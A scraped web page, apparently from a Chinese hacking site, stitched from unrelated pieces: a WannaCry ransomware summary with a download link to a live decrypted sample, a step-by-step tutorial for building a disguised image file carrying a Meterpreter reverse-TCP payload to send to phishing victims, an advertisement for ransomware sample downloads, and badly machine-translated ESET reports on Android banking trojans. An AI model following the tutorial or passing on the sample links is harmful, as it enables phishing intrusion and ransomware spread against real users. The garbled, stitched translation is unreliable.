    • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
    • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
    • Ransom: between $300 to $600. There is code to ‘rm’ (delete) files in the virus. Seems to reset if the virus crashes.
    • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: Malwarebytes)
    • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

    A decrypted sample of the WannaCry ransomware is availablehere:

    https://transfer.sh/ZhnxR/CYBER1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.EXE

    The Kill Switch

    A few hours after the massive attacks security experts started their analysis of the malicious code after a reverse engineering of the samples of the malware available in the wild. The good news emerged from the first investigation is that malware researchers have discovered a kill switch in the ransomware code, a condition that could halt the execution of the code when matched.

    ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

    Figure 4 – Kevin Beaumont Tweet about the kill switch

    The UK experts atMalwareTechBloghave registered the domain after they made a reverse engineering of the code.

    The Kill Switch domain is iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; the domain was sinkholed by law enforcement. To a server in California, and the admins of the infected systems reaching out to the dot-com will be notified, we are told. “IP addresses from our sinkhole have been sent to FBI.

    Figure 5 – Kill Switch domain

    Below the messages displayed when a machine tries to connect it:

    “IP addresses from our sinkhole have been sent to FBI andShadowServerso affected organizations should get a notification soon,”saidthe researcher. The InfoSec bodyadmittedthey registered the domain first, then realized it was a kill switch. Still, job done.”

    Experts from CISCO Talos group made an interesting analysis of the WannaCry ransomware.

    “WannaCry does not appear to only be leveraging the ETERNALBLUE modules associated with this attack framework; it is simply scanning accessible servers for the presence of the DOUBLEPULSAR backdoor. In cases where it identifies a host that has been implanted with this backdoor, it simply leverages the existing backdoor functionality available and uses it to infect the system with WannaCry.” reads theanalysisfrom Talos. ” In cases where the system has not been previously compromised and implanted with DOUBLEPULSAR, the malware will use ETERNALBLUE for the initial exploitation of the SMB vulnerability. This is the cause of the worm-like activity that has been widely observed across the internet.”

    Microsoft has published asecurity advisoryfor the threat and an emergency patch forWindows XP.

    The IT giant released emergency security patches for Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.

    Conclusions

    The following aspects of the massive ransomware attack must be carefully considered:

    • This attack demonstrates the risks related to themilitarization of the cyberspace. Malware, exploits code and hacking tools developed by intelligence agencies and governments could be very dangerous when out of control.
    • The success of the malware is due to the wrong security posture of the victims that have no awareness of the threat, and that did not apply security patches released by Microsoft.
    • Modern critical infrastructure is not resilient to cyber-attacks

中国骇客云之图片后门捆绑利用工具FakeImageExploiter?Embedded Backdoor with Image using FakeImageExploiter

backdoor.jpg
在这里,要向大家推荐一款名为“Fake Image Exploiter”的安全工具,该工具可以在图片文件中捆绑隐藏的恶意.bat或.exe程序,方便钓鱼或社工攻击测试过程中的入侵控制。如果受害者点击该恶意图片文件后,将会向控制主机反弹一个管理控制会话。以下是其使用视频:

https://www.youtube.com/watch?v=4dEYIO-xBHU

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!

Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.

Now made some changes inside setting file as shown the screenshot:

Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO and scroll down for next configration.

In same way set these two values also as shown in screenshot then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making certain changes in setting file then open the terminal and run the program file:

Cd FakeImageExploiter

./ FakeImageExploiter.sh

Click on YES to execute framework.

Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.

After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.

Now select icon for your malicious image.

Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.

Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.

When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

配置使用

首先,打开Kali终端,执行下载安装和配置:

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

1 (1).png

下载完成之后,进入FakeImageExploiter文件夹,选择setting文件进行配置:

2.png

在此,你可以选择隐藏在图片中的Payload格式,有ps1、bat、txt和exe四种格式可选,我们选择PAYLOAD_EXETNSION=bat;在生成捆绑图片文件的替换图标icon选项中,我们选择BYPASS_RH=NO,非自动,需要手动更改和添加最终生成的图片图标icon。

3.png

同样,在setting文件中找到以下两列进行按需修改:

AUTO_PAYLOAD_BUILD=YES (自动生成Payload选项)

AGENT_HANLER_PORT=4444(植入恶意程序后的客户端监听端口)

4.png

配置选项完成后,可以启动Fake Image Exploiter主程序。

生成Payload

Cd FakeImageExploiter

./ FakeImageExploiter.sh

5.png

选择YES启动Payload生成配置框架:

6.png

选择在捆绑在图片文件中的恶意程序需要加载利用的Payload,这里我们选择window/meterpreter/reverse_tcp:

7.png

之后,会跳出提示框,需要手动选择你需要捆绑.bat Payload进行伪装利用的jpg图片文件:

8.png

以及最终图片文件的替换图标icon主题:

9.png

接下来,为最终捆绑好的恶意图片文件进行命名:

10.png

FakeImageExploiter最后会生成在两个位置生成恶意图片文件,一个为本机Apache2 web服务的根目录下的.zip文件,另外为FakeImageExploiter输出文件夹(output)下的隐藏后缀恶意图片文件,点击执行后,该文件在显示jpg图像的同时,还会隐秘生成一个连向控制主机的反弹管理会话:

11.png

以下是控制端成功连接后显示的反弹管理会话:

12.png

好了,工具介绍完了,但请别用于非法目的哦。

 

“永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!

网上收集整理了已有的样本MD5,如果中国地区不能正常的下载到此病毒样本可以进行翻墙或者是进行vpn代理下载即可,下载地址:
继续阅读““永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!”

发布的Android恶意软件的源代码,用于运行银行僵尸网络

这个新的Android恶意软件银行最近发现在谷歌Play ESET发现再次在野外,更针对银行。这种表面的威胁进一步调查发现其代码中使用的是公开的几个月前的源代码建立。

检测由ESET作为trojan.android/spy.banker.hu的早期版本(1.1版–的源代码作者标记)和2月6日报道TH。恶意软件是通过谷歌游戏作为一个木马版本的一个合法的天气预报中的应用分布好天气。特洛伊目标22土耳其移动银行应用程序,试图收获凭据使用假冒的登录表单。此外,它可以被感染的设备远程锁定和解锁,以及拦截短信。

上星期日,我们发现在谷歌播放的版本新的木马,伪装成另一个合法的天气应用程序,这个时候世界天气。特洛伊,检测由ESET作为trojan.android/spy.banker.hw(1.2版),可在谷歌Play商店从2月14日TH直到被报道由ESET和拉从2月20日的商店TH

连接点

第二发现导致另一轮的调查,提供了一些有趣的启示。

事实证明,这些都是基于免费的Android木马的源代码是公开的在线。据称,从头写起,Android的恶意软件的“模板”代码,随着C&#38;C服务器–包括Web控制面板–已经在俄罗斯论坛自12月19日以来已可用的代码TH,2016

图1–源代码的Android恶意软件和C &#38; C在俄罗斯论坛公开

随后的调查带来的结果博士网络我们的关注,他们分析了一个恶意软件的早期的变种(由我们系统自12月26日检测TH2016,安卓/间谍。银行家HH)。

然而,这种变异并不直接连接到那些我们在谷歌播放找到,即使我们发现它同样检测名义下,版本1。我们能够确认这获得了僵尸网络的C&C服务器控制面板后,这是启动和运行,在我们调查的时间。通过控制面板,我们能够收集信息关于所有2800感染的僵尸网络恶意软件的版本。

图2–C &#38; C Web控制面板上市的恶意软件的受害者

下面是用户群体受到了恶意软件的概述,基于C和C控制面板中列出的僵尸网络数据:

有趣的是,C&C服务器本身,活动自2017年2月2日以来,已接近谁有网址,无需任何证件。

图3–调查时间表

它是如何运行的呢?

新发现的版本基本上相同的功能作为它的前身。在它的顶部采用了从原来的合法应用天气预报功能,trojan.android/spy.banker.hw能够锁定和解锁被感染的设备远程设置锁屏密码和短信拦截。

两者之间唯一的区别似乎是一个更广泛的目标群体–恶意软件现在影响69英国、奥地利用户,德国和土耳其的银行应用程序的–和更先进的混淆技术。

图4–谷歌恶意APP游戏

图5–绿色–合法世界天气图标;红–恶意版本

该木马还具有一个内置的通知功能,其目的只能验证访问C&C服务器后。原来,该恶意软件能够在受感染的设备显示假通知,提示用户启动一个应用程序在目标银行从各银行的一个“重要信息”的名义。通过这样做,在一个虚假的登录屏幕形式恶意活动触发。

图6–C &#38; C发送伪造的通知消息的受感染的设备

图7–假冒的银行应用程序通知从C&#38;C发送

我的设备被感染了?我怎么清理?

如果你最近从Play商店安装了一个天气应用程序,你可能要检查,如果你没有这一银行木马的受害者。

In case you think you might have downloaded an app named Weather, look for it under Settings -> Application Manger. If you see the app depicted in Fig. 8, and also find “System update” under Settings -> Security -> Device administrators (Fig. 9), your device has been infected.

清洁您的设备,我们建议你向一个移动安全解决方案,或者你可以手动删除恶意软件。

To manually uninstall the trojan, it is first necessary to deactivate its device administrator rights found under Settings -> Security -> System update. With that done, you can uninstall the malicious app in Settings -> Application Manger -> Weather.

图8:在应用程序管理器的木马

图9:恶意软件伪装成有源设备管理员在系统更新

如何保持安全

而这背后的僵尸网络攻击者的特定群体选择传播恶意软件的木马程序通过天气和目标列在文章底部的银行,没有保证的代码不是或不被用在别的地方。

记住,要坚持一些基本的原则来保护移动恶意软件很好。

虽然不是完美无瑕,谷歌Play也采用先进的安全机制,防止恶意软件了。这可能不会与其他应用程序商店或其他来源不明的情况下,选择谷歌官方Play商店尽可能。

而从Play商店下载,确保能在安装或更新知道应用程序的权限。而不是自动给一个应用程序的权限要求,考虑他们的意思是应用程序以及你的设备。如果任何事情了,读什么其他用户写在他们的评论和下载相应的反思。

运行你已经安装在您的移动设备后,请继续关注哪些权限和权利要求。一个应用程序不会运行没有高级权限,没有连接到其预定的功能可能是一个应用程序你不想安装在你的手机上。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题

你也可以阻止由ESET的站在今年的移动世界大会

样品

包的名字搞砸检测
goodish.weatherca2250a787fac7c6eef6158ef48a3b6d52c6bc4bAndroid / spy.banker.hh
goodish.weathera69c9bad3db04d106d92fd82ef4503ea012d0da9Android / spy.banker.hu
follon.weatherf533761a3a67c95dc6733b92b838380695ed1e92Android / spy.banker.hw

有针对性的应用

Android / spy.banker.hh和Android / spy.banker.hu:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank

Android / spy.banker.hw:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.android
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank
com.isis _ papyrus.raiffeisen _付费的_ eyewdg
at.spardat.netbanking
at.bawag.mbanking
at.volksbank.volksbankmobile
com.bankaustria.android.olb
at.easybank.mbanking
com.starfinanz.smob.android.sfinanzstatus
com.starfinanz.smob.android.sbanking
de.fiducia.smartphone.android.banking.vr
com.db.mm.deutschebank
de.postbank.finanzassistent
de.commerzbanking.mobil
com.ing.diba.mbbr2
de.ing_diba.kontostand
de.dkb.portalapp
com.starfinanz.mobile.android.dkbpushtan
de.consorsbank
de.comdirect.android
mobile.santander.de
de.adesso.mobile.android.gad
com.grppl.android.shell.bos
uk.co.bankofscotland.businessbank
com.barclays.android.barclaysmobilebanking
com.barclays.bca
com.ie.capitalone.uk
com.monitise.client.android.clydesdale
com.monitise.coop
uk.co.northernbank.android.tribank
com.firstdirect.bankingonthego
com.grppl.android.shell.halifax
com.htsu.hsbcpersonalbanking
com.hsbc.hsbcukcmb
com.grppl.android.shell.cmblloydstsb73
com.lloydsbank.businessmobile
uk.co.metrobankonline.personal.mobile
co.uk.nationwide.mobile
com.rbs.mobile.android.natwest
com.rbs.mobile.android.natwestbandc
com.rbs.mobile.android.rbsm
com.rbs.mobile.android.rbsbandc
uk.co.santander.santanderuk
uk.co.santander.businessuk.bb
com.tescobank.mobile
uk.co.tsb.mobilebank
com.rbs.mobile.android.ubn
com.monitise.client.android.yorkshire

中国骇客提醒您近期Android木马猖狂模仿用户点击下载危险的恶意软件

Android用户已经接触到一个新的恶意程序模仿Adobe Flash Player作为多种危险的恶意软件的一个潜在的入口。的应用,检测由ESET安全软件为Android / trojandownloader.agent.ji,花样其受害者给予它在Android访问菜单特殊权限和使用这些下载并执行攻击者选择额外的恶意软件。

根据我们的分析,该木马的目标设备上运行Android,包括最新的版本。它是通过入侵网站–成人视频网站的分布,但也通过社会媒体。安全措施的借口下,网站引诱用户下载一个假的Adobe Flash Player更新。如果受害者属于合法寻找更新屏幕,运行安装,他们有更多的欺骗性的屏幕期待。

图1:假冒的Flash Player更新屏幕

那怎么使用呢?

下一个虚假的屏幕弹出以下安装成功,声称“太耗能量”并要求用户打开一个假的“节省电池”的模式。像大多数恶意弹出窗口,消息不会停止,直到受害者出现了并同意启用服务。这将打开Android访问菜单、列表显示服务可及性功能。合法的中,一个新的服务(在安装期间创建的恶意软件)命名为“节省电池”出现。然后服务请求的权限监控你的行动检索窗口内容打开通过触摸来探索–所有关键的未来的恶意行为,使攻击者模仿用户的点击和选择显示在屏幕上的任何事。

图2:弹出屏幕要求“节约电池”安装后

图3:辅助功能菜单与Android恶意服务

图3:辅助功能菜单与Android恶意服务

一旦服务启用,假冒的Flash播放器图标隐藏用户。然而,在这种背景下,恶意软件正忙着联系C&C服务器和它提供的关于妥协的设备信息。服务器URL导致检测的情况下,网络罪犯的选择–恶意应用程序响应,银行恶意软件(虽然它可以是任何的恶意软件包括广告软件通过间谍软件,并对勒索)。获取恶意链接后,受损的设备显示一个虚假的锁屏不能选择关闭它,包括正在进行的恶意活动下。

图5:锁屏覆盖恶意活动

这是当允许模仿用户的点击就派上用场了–恶意软件现在是免费下载,安装,执行并激活额外的恶意软件的设备管理员权限,在用户不知情的情况下,却依然看不见假锁屏下。在应用程序的秘密把戏完成,覆盖屏幕消失,用户可以继续使用移动设备–现在被下载的恶意软件。

我的设备被感染了?我怎么清理?

如果你认为你可能有过去安装这个假冒的Flash播放器的更新,你可以很容易地通过检查储蓄电池在辅助菜单验证服务。如果上市的服务,您的设备很可能被感染。

拒绝服务的权限只会带你回到第一个弹出屏幕并不会摆脱Android / trojandownloader.agent.ji。

To remove the downloader, try manually uninstalling the app from Settings -> Application Manager -> Flash-Player.

In some instances, the downloader also requests that the user activate Device administrator rights. If that turns out to be the case and you can’t uninstall the app, deactivate the administrator rights by going to Settings -> Security -> Flash-Player and then proceed with uninstalling.

即使这样,你的设备可能仍然是由无数的恶意程序通过下载安装感染。确保你的设备是干净的,我们建议使用一个有信誉的移动安全应用程序作为一种轻松的方法来检测和消除威胁。

如何保持安全

为了避免处理讨厌的移动恶意软件的后果,预防是关键。除了坚持值得信赖的网站,有更多的事情可以做,以保持安全。

如果你在你的浏览器下载的应用程序或更新,经常检查URL地址来确定你打算从源码安装。在这种特殊情况下,得到您的Adobe Flash Player更新唯一安全的地方是从Adobe官方网站。

运行你已经安装在您的移动设备后,注意哪些权限和权利要求。如果一个应用程序请求的权限,似乎不适合它的功能,不使这些没有仔细检查。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题。你也可以阻止由ESET的站在今年的移动世界大会

从被感染的设备视频采集(时间编辑)

视频片段(截取自被感染的设备)

http://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/

分析示例

Package NameHashDetection name
loader.com.loader4F086B56C98257D6AFD27F04C5C52A48C03E9D62Android/TrojanDownloader.Agent.JI
cosmetiq.flC6A72B78A28CE14E992189322BE74139AEF2B463Android/Spy.Banker.HD